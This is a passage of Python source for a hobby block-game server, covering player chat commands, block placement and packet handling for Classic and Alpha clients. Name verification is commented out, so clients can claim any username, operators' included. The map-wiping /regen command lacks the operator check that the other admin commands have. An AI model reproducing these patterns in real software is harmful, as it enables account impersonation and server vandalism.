self.pid['alpha']=pid+1\n        \n        self.persistent_id = 0 ## Set later\n        \n        self.color = random.choice([\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"9\", \"a\", \"b\", \"c\", \"d\", \"e\"])\n        \n        self.last_message = None\n        self.message_queue = []\n        \n        self.block_queue = []\n        \n        self.positionable = True\n        self.pos_changed = True\n        self.x = 0\n        self.y = 0\n        self.stance = 65.0\n        self.z = 0\n        self.heading = 0\n        self.pitch = 0\n        self.holding = 0\n        \n        self.spawned = None\n        self.despawn = False\n        self.disconnected = False\n        \n        self.disconnect_reason = None\n        \n        self.float = None\n        self.marking = False\n        self.about = False\n        self.paint = False\n        self.fuckedtree=False\n        self.cuboid = 0 ## Send block changes to cuboid if set\n        self.cuboid_x = 0\n        self.cuboid_y = 0\n        self.cuboid_z = 0\n        self.cuboid_with = None\n        \n        #self.inventory = [Item(B['tnt'], 1, 0)]*45 ## MUCH BETTER\n        \n        first_id, = struct.unpack(\">B\", first_byte)\n        if first_id == PC_IDENT: self.protocol = ClassicProtocol(self, conn, addr, first_id) #todo: make this send first_byte not id\n        elif first_id == PA_HANDSHAKE: self.protocol = AlphaProtocol (self, conn, addr, first_id)\n        elif first_byte in (b\"C\", b\"N\"):self.protocol = IRCProtocol (self, conn, addr, first_byte)\n        else: print(\"Undetected client by first byte: {}\".format(first_id))\n    \n    def __str__(self):\n        return (\"Player {}, protocol {}, pids {}; {}\".format(self.name, self.protocol.NAME, self.pid, self.addr))\n    \n    def format_name(self):\n        return (\"§{}{}\".format(self.color, self.name))\n    \n    def get_last_message(self):\n        last_message = self.last_message\n        self.last_message = None\n        return last_message\n    \n    def parse_message(self, message):\n        if message[0] == \"/\": # It's a command!\n            args = message[1:].split(\" \")\n            if args[0] == \"float\":\n                if self.float != None:\n                    self.float = None\n                    self.message_queue.append(\"§eFLOAT: §cDisabled.\")\n                else:\n                    self.float = self.y\n                    self.message_queue.append(\"§eFLOAT: §aEnabled.\") \n            elif args[0] == \"cuboid\":\n                if server.get_class_for_persistent_id(self.persistent_id) == 
'OP':\n                    if len(args)>1:\n                        try:\n                            B[args[1]]\n                        except KeyError:\n                            self.message_queue.append(\"§eCUBOID: §cInvalid/Unknown block type\")\n                        else:\n                            self.cuboid = 1\n                            self.cuboid_with = args[1]\n                            self.message_queue.append(\"§eCUBOID: The block type §f{}§e will be used to cuboid.\".format(self.cuboid_with))\n                    else:\n                        self.message_queue.append(\"§eCUBOID: The second point's block will be used to cuboid.\")\n                        self.cuboid = 1\n                    if self.cuboid == 1:\n                        self.marking = True\n                        self.message_queue.append(\"§eCUBOID: Change two blocks to specify corners of cuboid.\")\n                else:\n                    self.message_queue.append(\"§eCUBOID: You need to be OP to use CUBOID\")\n            elif args[0] == \"about\":\n                self.message_queue.append(\"§eABOUT: Mark a block to get its info.\")\n                self.about = True\n                self.marking = True\n            elif args[0] == \"paint\":\n                if self.paint:\n                    self.paint = False\n                    self.message_queue.append(\"§ePAINT: §cDisabled.\")\n                else:\n                    self.paint = True\n                    self.message_queue.append(\"§ePAINT: §aEnabled.§e Destroyed blocks will be painted.\")\n            elif args[0] == \"regen\":\n                if len(args)>1: # sizes arrive as strings, so convert them before regenerating\n                    server.main.map_x=int(args[1])\n                    server.main.map_y=int(args[2])\n                    server.main.map_z=int(args[3])\n                server.main.create_landscape()\n                server.main.spam_blocks() ## Spams blocks to global block queue - Reloads map under players' feet :D\n                ##self.protocol.send_map()\n            elif args[0] == \"save\":\n                if server.get_class_for_persistent_id(self.persistent_id) == 'OP':\n                    server.main.save(\"map.twnsrv\")\n                    server.message_queue.append(\"§eSAVE: §aMap saved.\")\n                else:\n                    self.message_queue.append(\"§eSAVE: §cYou need to be OP to use SAVE\")\n            elif args[0] == \"op\":\n                if server.get_class_for_persistent_id(self.persistent_id) == 'OP':\n                    pid = server.find_persistent_id(args[1])\n                    if pid != None:\n                        server.set_class_for_persistent_id(pid,'OP')\n                        server.save_persistent_ids()\n                        self.message_queue.append(\"§eOP: §a\"+server.get_name_for_persistent_id(pid)+\" was promoted to op\")\n                    else:\n                        self.message_queue.append(\"§eOP: §cUnknown player name.\")\n                else:\n                    self.message_queue.append(\"§eOP: §cYou need to be OP to use OP\")\n            elif args[0] == \"deop\":\n                if server.get_class_for_persistent_id(self.persistent_id) == 'OP':\n                    pid = server.find_persistent_id(args[1])\n                    if pid != None:\n                        server.set_class_for_persistent_id(pid,'')\n                        server.save_persistent_ids()\n                        self.message_queue.append(\"§eDEOP: §a\"+server.get_name_for_persistent_id(pid)+\" was demoted from op\")\n                    else:\n                        self.message_queue.append(\"§eDEOP: §cUnknown player name.\")\n                else:\n                    self.message_queue.append(\"§eDEOP: §cYou need to be OP to use DEOP\")\n            elif args[0] == \"ban\":\n                if server.get_class_for_persistent_id(self.persistent_id) == 'OP':\n                    pid = server.find_persistent_id(args[1])\n                    if pid != None:\n                        server.set_class_for_persistent_id(pid,'BAN')\n                        server.save_persistent_ids()\n                        ## FIXME: Kick player here\n                        self.message_queue.append(\"§eBAN: §a\"+server.get_name_for_persistent_id(pid)+\" was banned\")\n                    else:\n                        self.message_queue.append(\"§eBAN: §cUnknown player name.\")\n                else:\n                    self.message_queue.append(\"§eBAN: §cYou need to be OP to use BAN\")\n            elif args[0] == \"unban\":\n                if server.get_class_for_persistent_id(self.persistent_id) == 'OP':\n                    pid = server.find_persistent_id(args[1])\n                    if pid != None:\n                        if server.get_class_for_persistent_id(pid)=='BAN':\n                            server.set_class_for_persistent_id(pid,'')\n                            server.save_persistent_ids()\n                            self.message_queue.append(\"§eUNBAN: §a\"+server.get_name_for_persistent_id(pid)+\" was unbanned\")\n                        else:\n                            self.message_queue.append(\"§eUNBAN: §cPlayer is not 
banned.\")\n                    else:\n                        self.message_queue.append(\"§eUNBAN: §cUnknown player name.\")\n                else:\n                    self.message_queue.append(\"§eUNBAN: §cYou need to be OP to use UNBAN\")\n            else:\n                self.message_queue.append(\"§cUnknown command.\")\n        else:\n            self.last_message = message\n    \n    def placed_block(self, x, y, z, block_type, face = None):\n        if self.marking:\n            self.block_queue.append((x, y, z))\n            self.marking = False\n            \n            if self.cuboid == 1:\n                self.cuboid_x = x\n                self.cuboid_y = y\n                self.cuboid_z = z\n                self.cuboid = 2\n                self.message_queue.append(\"§eCUBOID: First point set - x: {} y: {} z: {}\".format(x, y, z))\n                self.marking = True\n            elif self.cuboid == 2:\n                self.message_queue.append(\"§eCUBOID: Second point set - x: {} y: {} z: {}\".format(x, y, z))\n                self.message_queue.append(\"§eCUBOID: §cCreating...\")\n                blocks = server.main.cuboid(self.cuboid_x,self.cuboid_y,self.cuboid_z,x,y,z,block_type if self.cuboid_with==None else B[self.cuboid_with],0,self.persistent_id) ## Fix the first 0!\n                self.message_queue.append(\"§eCUBOID: §aDone cuboiding {} blocks\".format(blocks))\n                self.cuboid = 0\n                self.cuboid_with = None\n            elif self.about:\n                self.about = False\n                self.message_queue.append(\"§eABOUT: x: {} y: {} z: {} - {}\".format(x, y, z, server.main.map[x][y][z]))\n            elif self.fuckedtree:\n                self.fuckedtree = False\n                server.main.place_fucked_tree(x, y, z)\n        else:\n            metadata = None\n            if block_type == 0x00 and self.paint == True:\n                block_type = self.holding\n            elif block_type == B['step']:\n                if server.main.block_at(x,y-1,z).get(None) == B['step']: ## If block below is a step \n                    self.block_queue.append((x, y, z))\n                    y = y-1\n                    self.block_queue.append((x, y, z))\n                    block_type = B['doublestep']\n            elif block_type in (B['ladder'], B['furnace'], B['burningfurnace'], B['wallsign']):\n                if face in (2, 3, 4, 5): metadata = face\n            elif block_type == B['signpost']:\n                if face == 2: metadata = 8\n                elif face == 3: metadata = 0\n                elif face == 4: metadata = 4\n                elif face == 5: metadata = 12\n            elif block_type in (B['pumpkin'], B['jackolantern']):\n                if face == 2: metadata = 0\n                elif face == 3: metadata = 2\n                elif face == 4: metadata = 3\n                elif face == 5: metadata = 1\n            elif block_type in (B['woodenstairs'], B['cobblestonestairs']):\n                if face == 2: metadata = 2\n                elif face == 3: metadata = 3\n                elif face == 4: metadata = 0\n                elif face == 5: metadata = 1\n            elif block_type in (B['stonebutton'], B['lever']):\n                if face == 2: metadata = 0\n                elif face == 3: metadata = 3\n                elif face == 4: metadata = 2\n                elif face == 5: metadata = 1\n                elif block_type == B['lever']: metadata = 5\n            elif block_type == B['torch'] or block_type == B['redstonetorchon'] or block_type == B['redstonetorchoff']:\n                if face == 2: metadata = 4\n                elif face == 3: metadata = 3\n                elif face == 4: metadata = 2\n                elif face == 5: metadata = 1\n                else: metadata = 0\n            if server.main.set_block(x,y,z,block_type,0,self.persistent_id,metadata) == None: ## Fix the first 0\n                if debug: self.message_queue.append(\"§cYou can't build there!\")\n                pass\n    \n    def step(self):\n        self.protocol.step()\n        for message in self.message_queue:\n            self.protocol.send_message(message)\n        self.message_queue = []\n        for x, y, z in self.block_queue:\n            self.protocol.send_set_block(x, y, z, server.main.map[x][y][z])\n        self.block_queue = []\n        if self.float != None:\n            if self.y < self.float:\n                self.y = self.float\n                self.protocol.send_player_teleport(self)\n\nclass ClassicProtocol:\n    \"\"\" A class handling the Classic protocol for Client. 
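Classic framing: every packet is a single id byte followed by a fixed-size payload whose struct format lives in PACKETS, so recv() buffers one byte at a time and hands the finished buffer to parse_packet() once packet_len() bytes for that id have arrived. 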
\"\"\"\n    def __init__(self, client, conn, addr, first_id): \n        #self.pid = server.last_pid+1\n        \n        self.client = client\n        self.conn = conn\n        self.addr = addr\n        \n        #server.last_pid = self.pid\n        \n        self.spawned = None\n        \n        self.last_packet = b\"\"\n        self.last_packet_id = first_id\n        self.last_packet_len = self.packet_len(first_id)\n        \n        self.COLORCHAR = \"&\"\n        self.NAME = \"classic\"\n    \n    def __str__(self):\n        return self.NAME\n    \n    #This actually still makes it crash sometimes\n    \n    # DUMMY FUNCTIONS\n    def classic_to_alpha(self, x, y, z, heading, pitch):\n        #y -= 50\n        #heading = math.floor(360*(heading/255))\n        #pitch = math.floor(360*(pitch/255))\n        return (x, y-50, z, (heading-127) % 255, pitch)\n    def alpha_to_classic(self, x, y, z, heading, pitch):\n        #y += 50\n        return (int(x), int(y)+50, int(z), (heading+127)%255, pitch)\n    \n    def recv(self):\n        try: recv = self.conn.recv(1)\n        except socket.error: return\n        if recv == b\"\": return\n        if self.last_packet_id == None:\n            self.last_packet_id, = struct.unpack(\">B\",recv)\n            try: PACKETS[self.last_packet_id]\n            except KeyError: \n                print (\"Unknown packet id: {}\".format(self.last_packet_id))\n                self.last_packet_id = None\n                return\n            else:\n                self.last_packet_len = self.packet_len(self.last_packet_id)\n                #print(\"Packet id is %s, len %d\" % (self.last_packet_id, self.last_packet_len))\n        else:\n            self.last_packet += recv\n            if len(self.last_packet) == self.last_packet_len:\n                self.parse_packet(self.last_packet_id, self.last_packet)\n                self.last_packet = b\"\"\n                self.last_packet_id = None\n                self.last_packet_len = 0\n    \n    def parse_packet(self, packet_id, packet):\n        def unstring(string):\n            return string.decode(\"ASCII\").strip()\n        try: fields = struct.unpack(\">\"+PACKETS[packet_id], packet)\n        except struct.error:\n            print (\"INVALID PACKET - ID {} - {}\".format(packet_id, packet))\n            return\n        #print (\"Recv: {}\".format(packet_id), end=\" \")\n        if packet_id == PC_IDENT:\n            protocol_version, username, verification_key, u1 = fields\n            self.client.name = unstring(username)\n            #if server.online_mode an # <- wtf you messed this up\n\n            #if verification_key != hashlib.md5(server.salt.encode(\"ASCII\")+self.client.name.encode(\"ASCII\")).hexdigest():\n            #    print (\"{} tried to connect, but verification was incorrect!\".format(self.client.name))\n            #    self.send_packet(PC_DISCONNECT, \"Wrong verification.\")\n            #    return\n            pid = server.find_persistent_id(self.client.name)\n            if pid == None:\n                pid = server.add_persistent_id(self.client.name)\n            self.client.persistent_id = pid\n            if server.get_class_for_persistent_id(pid) == 'BAN':\n                ## FIXME: Kick player here\n                self.disconnect(\"Banned\")\n                print(\"Player is banned! 
(FIXME)\")\n                pass\n            \n            verification_key = unstring(verification_key)\n            #print (\"PC_IDENT Version: %d; Username: %s; Verification key: %s; u1: %d\" % (protocol_version, self.client.name, verification_key, u1))\n            # Verification to come here.\n            self.send_packet(PC_IDENT, 7, server.name, server.motd, 42)\n            self.send_map()\n            self.send_packet(PC_PLAYER_TELEPORT, 0xff, (server.main.map_x//2)*32, (server.main.map_y)*32, (server.main.map_z//2)*32, 0, 0)\n            self.client.spawned = False\n        \n        elif packet_id == PC_SET_BLOCK_CLIENT:\n            x, y, z, mode, block_type = fields \n            self.client.holding = block_type\n            if server.main.block_at(x, y, z): self.client.placed_block(x, y, z, block_type if mode else 0x00)\n        \n        elif packet_id == PC_PLAYER_TELEPORT:\n            p, x, y, z, heading, pitch = fields\n            x, y, z, heading, pitch = self.classic_to_alpha(x, y, z, heading, pitch)\n            if (0xff, self.client.x, self.client.y, self.client.z, self.client.heading, self.client.pitch) != (p, x, y, z, heading, pitch):\n                self.client.pos_changed = True\n                self.client.x, self.client.y, self.client.z, self.client.heading, self.client.pitch = x, y, z, heading, pitch\n            #print (\"PC_PLAYER_TELEPORT pid: {}, xyz: {} {} {}, heading: {}, pitch: ?\".format(pid, x, y, z, heading))\n        \n        elif packet_id == PC_MESSAGE:\n            u1, message = fields\n            message = unstring(message)\n            self.client.parse_message(message)\n    \n    def kick(self, reason):\n        self.send_packet(PC_DISCONNECT, reason)\n        self.disconnect(reason)\n    \n    def disconnect(self, reason):\n        #self.send_packet(PC_DISCONNECT, reason) #Right, infinite loop.\n        self.conn.close()\n        self.client.despawn = True\n        self.client.disconnect_reason = reason\n    \n    def build_packet(self, packet_id, *arguments):\n        try:\n            return struct.pack(\">B\"+PACKETS[packet_id], packet_id, *arguments)\n        except struct.error as err:\n            print (\"!!! 
struct.error: {} (packet {}, arguments: {})\".format(err, packet_id, \", \".join(str(argument) for argument in arguments)))\n raise\n \n def packet_len(self, packet_id):\n return struct.calcsize(\">\"+PACKETS[packet_id])\n\n def send_packet(self, packet_id, *arguments):\n packet = self.build_packet(packet_id, *arguments)\n #print (str(self.client.pid['classic'])+\">\"+str(packet)) #OW MEMORY CPU OW OW OW\n if self.client.disconnected == False:\n try: self.conn.send(packet)\n except socket.error:\n self.disconnect(None)\n \n def send_message(self, message):\n message = message.replace(\"§\", self.COLORCHAR)\n # This is ugly.\n len = 0\n displen = 0\n prevchar = \"\"\n last_color = \"\"\n splitted = False\n for char in message:\n #print(\"{} {} {} {} {}\".format(char, len, displen, prevchar, last_colorchar))\n if displen==64:\n self.send_packet(PC_MESSAGE, 0x00, message[:len])\n splitted = True\n break\n len+=1\n if char != self.COLORCHAR and prevchar != self.COLORCHAR: displen+=1\n if prevchar == self.COLORCHAR: last_color = char\n prevchar = char\n self.send_packet(PC_MESSAGE, 0x00, self.COLORCHAR+last_color+message[len:] if splitted else message)\n def send_set_block(self, x, y, z, block):\n self.send_packet(PC_SET_BLOCK_SERVER, x, y, z, block.get(self.NAME))\n def send_spawn_player(self, client):\n x, y, z, heading, pitch = self.alpha_to_classic(client.x, client.y, client.z, client.heading, client.pitch)\n print( client.pid[self.NAME], client.name, x, y, z, heading, pitch)\n self.send_packet(PC_SPAWN_PLAYER, client.pid[self.NAME], client.name, x, y, z, heading, pitch)\n def send_despawn_player(self, client):\n self.send_packet(PC_DESPAWN_PLAYER, client.pid[self.NAME])\n def send_player_teleport(self, client):\n x, y, z, heading, pitch = self.alpha_to_classic(client.x, client.y, client.z, client.heading, client.pitch)\n self.send_packet(PC_PLAYER_TELEPORT, client.pid[self.NAME], x, y, z, heading, pitch)\n def send_map(self):\n self.send_packet(PC_LEVEL_INIT)\n with server.main.gzip_map() as gzipdata:\n self.send_packet(PC_IDENT, 7, server.name, \"Almost there!\", 42)\n while True:\n chunk = gzipdata.read(1024)\n self.send_packet(PC_LEVEL_CHUNK, len(chunk), chunk, random.randrange(0, 100, 1))\n if len(chunk) < 1024:\n break\n self.send_packet(PC_LEVEL_FINALIZE, server.main.map_x,server.main.map_y,server.main.map_z)\n \n def step(self):\n self.recv()\n \n \n\nclass AlphaProtocol:\n \"\"\" A class handling the Alpha protocol for Client. 
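Alpha packets are variable-length, so recv() walks the per-packet format strings in A_PACKETS as an incremental state machine: plain struct codes are read by size, \"S\" means a length-prefixed UTF-8 string, and \"T\" an item triple (type, amount, uses) whose type of -1 marks an empty slot; all parser state is kept on the instance so decoding can resume between calls on the non-blocking socket. 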
\"\"\"\n    def __init__(self, client, conn, addr, first_id): \n        \n        self.client = client\n        self.conn = conn\n        self.addr = addr\n        \n        #self.pid = server.last_pid+1\n        #server.last_pid = self.pid\n        #self.spawned = None\n        #self.despawn = False\n        #self.disconnected = False\n        \n        self.last_packet = () # tuple !\n        self.first_id = first_id\n        self.last_packet_id = None\n        self.last_packet_struct_pos = 0\n        self.last_packet_format_pos = 0\n        #self.last_packet_format_len = struct.calcsize(\">\"+A_PACKETS[self.last_packet_id][self.last_packet_struct_pos])\n        self.last_packet_format_len = None\n        self.last_packet_format_bts = b\"\"\n        self.last_packet_string = False\n        self.last_packet_item = False\n        self.last_timeout = time.time()\n        \n        self.block_hit = 0\n        \n        self.inventory_page = 0\n        \n        self.COLORCHAR = \"§\"\n        self.NAME = \"alpha\"\n    \n    def __str__(self):\n        return self.NAME\n    \n    def recv(self):\n        if self.first_id != None: # this is a hack D:\n            recv = struct.pack(\">B\", self.first_id)\n            self.first_id = None\n        else:\n            try: recv = self.conn.recv(1)\n            except socket.error: return\n        if recv == b\"\": return\n        #print (recv, end=\"\")\n        if self.last_packet_id == None:\n            self.last_packet_id, = struct.unpack(\">B\",recv)\n            try: A_PACKETS[self.last_packet_id]\n            except KeyError: \n                print (\"Unknown packet id: {}\".format(self.last_packet_id))\n                self.last_packet_id = None\n                return\n            else:\n                #fun stuff!\n                self.last_packet_struct_pos = 0\n                self.last_packet_format_pos = 0\n                if len(A_PACKETS[self.last_packet_id])==0:\n                    self.last_packet_format_len = 0\n                    self.parse_packet(self.last_packet_id, ())\n                    self.last_packet_id = None\n                    self.last_packet = ()\n                else:\n                    cur_format = A_PACKETS[self.last_packet_id][self.last_packet_struct_pos]\n                    if cur_format == \"S\":\n                        self.last_packet_format_len = 2\n                    else: \n                        self.last_packet_format_len = struct.calcsize(\">\"+cur_format)\n        else:\n            self.last_packet_format_bts+=recv\n            self.last_packet_format_pos+=1\n            if debug: print (\"{}/{}- {} >> {} [id {}]\".format(self.last_packet_format_pos, self.last_packet_format_len, self.last_packet_format_bts, self.last_packet, str(hex(self.last_packet_id))))\n            if self.last_packet_format_pos == self.last_packet_format_len:\n                if A_PACKETS[self.last_packet_id][self.last_packet_struct_pos] == \"S\":\n                    if self.last_packet_string == False:\n                        self.last_packet_string = True\n                        self.last_packet_format_len, = struct.unpack(\">h\",self.last_packet_format_bts)\n                        self.last_packet_format_pos = 0\n                        self.last_packet_format_bts = b\"\"\n                    else:\n                        self.last_packet += struct.unpack(\">\"+str(self.last_packet_format_len)+\"s\", self.last_packet_format_bts)[0].decode(\"utf-8\"), #ugly but does the job\n                        self.last_packet_string = False\n                        self.last_packet_format_bts = b\"\"\n                        self.last_packet_struct_pos+= 1\n                elif self.last_packet_item:\n                    if self.last_packet_item == 1 and struct.unpack(\">h\",self.last_packet_format_bts)[0] == -1:\n                        self.last_packet_item = False\n                        self.last_packet_struct_pos+= 1\n                    elif self.last_packet_item == 1: \n                        self.last_packet[-1].type, = struct.unpack(\">h\",self.last_packet_format_bts)\n                        self.last_packet_format_len = 1\n                        self.last_packet_item+=1\n                    elif self.last_packet_item == 2:\n                        self.last_packet[-1].amount, = struct.unpack(\">B\",self.last_packet_format_bts)\n                        self.last_packet_format_len = 1\n                        self.last_packet_item+=1\n                    elif self.last_packet_item == 3:\n                        self.last_packet[-1].uses, = struct.unpack(\">B\",self.last_packet_format_bts)\n                        self.last_packet_item = False\n                        self.last_packet_struct_pos+= 1\n                    self.last_packet_format_pos = 0\n                    self.last_packet_format_bts = b\"\"\n                    
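                # A plain fixed-size field is complete: unpack it below with its own struct code and advance to the packet's next field.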
\n else:\n self.last_packet += struct.unpack(\">\"+A_PACKETS[self.last_packet_id][self.last_packet_struct_pos], self.last_packet_format_bts)\n self.last_packet_format_bts = b\"\"\n self.last_packet_struct_pos+= 1\n if self.last_packet_struct_pos == len(A_PACKETS[self.last_packet_id]):\n #print (\"Finished reading packet id {}! {}\".format(str(hex(self.last_packet_id)), self.last_packet))\n self.parse_packet(self.last_packet_id, self.last_packet)\n self.last_packet_id = None\n self.last_packet = ()\n elif self.last_packet_format_pos == self.last_packet_format_len:\n cur_format = A_PACKETS[self.last_packet_id][self.last_packet_struct_pos]\n if cur_format == \"S\":\n self.last_packet_format_len = 2\n elif cur_format == \"T\": \n self.last_packet_format_len = 2\n self.last_packet_item = 1\n self.last_packet+=(Item(None),)\n else: \n self.last_packet_format_len = struct.calcsize(\">\"+cur_format)\n self.last_packet_format_pos = 0\n \n \n def alpha_pos_to_storage(self, x, y, stance, z, on_ground=None):\n x = int(x*32)\n y = int(y*32)\n stance = int(stance*32)\n z = int(z*32)\n if on_ground != None: return x, y, stance, z, on_ground\n return x, y, stance, z\n \n def alpha_rot_to_storage(self, yaw, pitch, on_ground = None):\n while yaw > 360:\n yaw = yaw - 360\n while yaw < 0:\n yaw = yaw + 360\n yaw = math.floor(0xff*(yaw/360))\n while pitch > 360:\n pitch = pitch - 360\n while pitch < 0:\n pitch = pitch + 360\n pitch = math.floor(0xff*(pitch/360))\n if on_ground != None: return yaw, pitch, on_ground\n return yaw, pitch\n \n def alpha_to_storage(self, x, stance, y, z, yaw, pitch, on_ground):\n return self.alpha_pos_to_storage(x, stance, y, z)+self.alpha_rot_to_storage(yaw, pitch)+(on_ground,)\n \n def parse_packet(self, packet_id, fields):\n pass\n if packet_id == PA_HANDSHAKE:\n self.client.name, = fields\n self.send_packet(PA_HANDSHAKE, \"-\") # TODO: Name verification.\n \n if packet_id == PA_IDENT:\n protocol_version, self.client.name, password, map_seed, dimension = fields\n self.send_packet(PA_IDENT, self.client.pid['alpha'], server.name, server.motd, 1337, 0) \n ##self.send_packet(PA_PRE_CHUNK, 0, 0, 1)\n ##self.send_map_chunk(0, 0, 0)\n self.send_map_chunks()\n self.send_packet(PA_SPAWN_POSITION, 0, 0, 0) ## Compass\n #self.send_player_inventory(self.client.inventory)\n self.send_inventory_page(0)\n #self.send_window_items(0, [Item(B['glass'], 1, 0)]*44)\n ##self.client.x = server.main.map_x//2*32\n self.client.x = 16//2*32\n self.client.y = server.main.map_y *32\n ##self.client.z = server.main.map_z//2*32\n self.client.z = 16//2*32\n self.send_packet(PA_PLAYER_POSITION_AND_LOOK, self.client.x/32, self.client.y/32, self.client.stance, self.client.z/32, self.client.heading, self.client.pitch, False)\n #print (\"Sent X,Y,Z:\"+str(self.client.x/32)+\",\"+str(self.client.y/32)+\",\"+str(self.client.z/32))\n self.client.spawned = False\n \n pid = server.find_persistent_id(self.client.name)\n if pid == None:\n pid = server.add_persistent_id(self.client.name)\n self.client.persistent_id = pid\n if server.get_class_for_persistent_id(pid) == 'BAN':\n ## FIXME: Kick player here\n self.disconnect(\"Banned\")\n print(\"Player is banned! 
(FIXME)\")\n pass\n \n \n if packet_id == PA_PLAYER_POSITION:\n x, y, stance, z, on_ground = self.alpha_pos_to_storage(*fields)\n if (self.client.x, self.client.y, self.client.stance, self.client.z) != (x, y, stance, z):\n self.client.pos_changed = True\n self.client.x, self.client.y, self.client.stance, self.client.z = x, y, stance, z\n if packet_id == PA_PLAYER_LOOK:\n heading, pitch, on_ground = self.alpha_rot_to_storage(*fields)\n if (self.client.heading, self.client.pitch) != (heading, pitch):\n self.client.pos_changed = True\n self.client.heading, self.client.pitch = heading, pitch\n \n if packet_id == PA_PLAYER_POSITION_AND_LOOK:\n x, y, stance, z, heading, pitch, on_ground = self.alpha_to_storage(*fields)\n if (self.client.x, self.client.stance, self.client.y, self.client.z, self.client.heading, self.client.pitch) != (x, stance, y, z, heading, pitch):\n self.client.pos_changed = True\n self.client.x, self.client.stance, self.client.y, self.client.z, self.client.heading, self.client.pitch = x, stance, y, z, heading, pitch\n if packet_id == PA_CHAT_MESSAGE:\n message, = fields\n self.client.parse_message(message)\n if packet_id == PA_PLAYER_DIGGING:\n status, x, y, z, face = fields\n if status in (0, 2):\n self.block_hit = 0\n if status == 1:\n self.block_hit+= 1\n if status in (3, 4) or self.block_hit > 3:\n self.block_hit = 0\n if server.main.block_at(x, y, z) and server.main.block_at(x, y, z).get(\"alpha\")!=B['bedrock']: self.client.placed_block(x, y, z, 0x00, face)\n if packet_id == PA_PLAYER_BLOCK_PLACEMENT:\n x, y, z, face, item = fields\n if item.type != None and item.type < 256:\n # todo: rewrite this\n if face == 0: y-=1\n elif face == 1: y+=1\n elif face == 2: z-=1\n elif face == 3: z+=1\n elif face == 4: x-=1\n elif face == 5: x+=1\n if server.main.block_at(x, y, z): self.client.placed_block(x, y, z, item.type, face)\n if packet_id == PA_WINDOW_CLICK:\n window_id, slot, right_click, action_number, item = fields\n if window_id == 0:\n if slot == -999: # Notch's arbitrary numbers. Is outside of window\n pass\n elif slot == 35:\n self.send_set_slot(0, slot, Item(None))\n self.send_inventory_page(self.inventory_page+1)\n elif slot == 9:\n self.send_set_slot(0, slot, Item(None))\n self.send_inventory_page(self.inventory_page-1)\n elif slot < 36:\n if right_click:\n self.client.message_queue.append(\"§eBlock {} ({}{})\".format(item.type, get_block_name(item.type), get_block_conversions(item.type)))\n self.send_set_slot(0, slot, item)\n self.send_set_slot(-1, 0, Item(None))\n else:\n self.send_set_slot(0, slot, item)\n if packet_id == PA_DISCONNECT_OR_KICK:\n self.client.despawn = True\n self.client.disconnect_reason, = fields\n \n \n def send_packet(self, packet_id, *args):\n to_send = struct.pack(\">B\", packet_id)\n for format, field in zip(A_PACKETS[packet_id], args):\n if format == \"S\":\n to_send += struct.pack(\">H{}s\".format(len(field)), len(field), field)\n else:\n try: to_send += struct.pack(\">\"+format, field)\n except struct.error as err:\n print (\"!!! 
struct.error: {} (packet {}, arguments: {} - field/format {}/{})\".format(err, packet_id, \", \".join(str(argument) for argument in args), field,format))\n                    raise\n        self.send(to_send)\n    \n    def send(self, send):\n        if self.client.disconnected == False:\n            try: self.conn.send(send)\n            except socket.error:\n                self.disconnect()\n    \n    def send_message(self, message):\n        self.send_packet(PA_CHAT_MESSAGE, message+\" \")# <- \"hack\" # also todo: make this prettify multiple lines\n    def send_map_chunks(self):\n        def send_map_chunk(i,j):\n            to_send = struct.pack(\">bihibbb\", PA_MAP_CHUNK, i,0,j, 16-1, server.main.map_y-1, 16-1)\n            zlib_map = server.main.zlib_map(i,0,j,16,server.main.map_y,16)\n            to_send += struct.pack(\">i{}s\".format(len(zlib_map)), len(zlib_map), zlib_map)\n            self.send_packet(PA_PRE_CHUNK,i//16,j//16,1)\n            self.send(to_send)\n        negboundaries = 2\n        posboundaries = 2\n        #threads = []\n        for i in range(0-16*negboundaries,server.main.map_x+16*posboundaries,16): ## +/-16*2 for boundaries\n            for j in range(0-16*negboundaries,server.main.map_z+16*posboundaries,16):\n                #threads.append(threading.Thread(None,send_map_chunk,None,(i,j)))\n                #for i in threads:\n                #    i.run()\n                send_map_chunk(i, j)\n    def send_set_slot(self, window, slot, item):\n        to_send = struct.pack(\">Bbh\", PA_SET_SLOT, window, slot) +item.pack()\n        self.send(to_send)\n    def send_window_items(self, window_id, items):\n        to_send = struct.pack(\">Bbh\", PA_WINDOW_ITEMS, window_id, len(items))\n        for item in items:\n            to_send += item.pack()\n        self.send(to_send)\n    def send_set_block(self, x, y, z, block):\n        self.send_packet(PA_BLOCK_CHANGE, x, y, z, block.get(self.NAME), block.high())\n    def send_spawn_player(self, client):\n        self.send_packet(PA_NAMED_ENTITY_SPAWN, client.pid[self.NAME], client.name, client.x, client.y, client.z, client.heading, client.pitch, client.holding)\n    def send_despawn_player(self, client):\n        self.send_packet(PA_DESTROY_ENTITY, client.pid[self.NAME])\n    def send_player_teleport(self, client):\n        self.send_packet(PA_ENTITY_TELEPORT, client.pid[self.NAME], client.x, client.y, client.z, client.heading, client.pitch)\n    \n    def send_inventory_page(self,page):\n        if page != -1:\n            self.inventory_page = page\n        inventory = [Item(None)]*10\n        for i in range(page*24+1, page*24+26):\n            if i>len(A_INVENTORY)-1: \n                inventory+=[Item(None)]\n            else:\n                inventory+=[Item(A_INVENTORY[i], 255, 0)]\n        self.send_window_items(0, inventory)\n    \n    \n    def kick(self, reason):\n        self.send_packet(PA_DISCONNECT_OR_KICK, reason)\n        self.disconnect()\n    \n    def disconnect(self):\n        self.conn.close()\n        self.client.despawn = True\n        self.client.disconnect_reason = \"Lost connection\"\n    \n    def step(self):\n        self.recv()\n        if self.client.spawned and self.client.pos_changed:\n            if self.client.x < 8 or self.client.z < 8 or self.client.x > (server.main.map_x*32)-8 or self.client.z > (server.main.map_z*32)-8 or self.client.y < 8:\n                if self.client.x < 8: self.client.x = 8\n                if self.client.x > (server.main.map_x*32)-8: self.client.x = server.main.map_x*32-8\n                if self.client.z < 8: self.client.z = 8\n                if self.client.z > (server.main.map_z*32)-8: self.client.z = server.main.map_z*32-8\n                if self.client.y < 0: self.client.y = server.main.map_y*32\n                self.send_packet(PA_PLAYER_POSITION_AND_LOOK, self.client.x/32, math.ceil((self.client.y/32)+1.5), self.client.stance, self.client.z/32, self.client.heading, self.client.pitch, True)\n        if time.time() - self.last_timeout > 5: ## Timeout prevention\n            self.send_packet(PA_KEEPALIVE)\n            self.last_timeout = time.time()\n\nclass IRCProtocol:\n    \"\"\" A class handling 
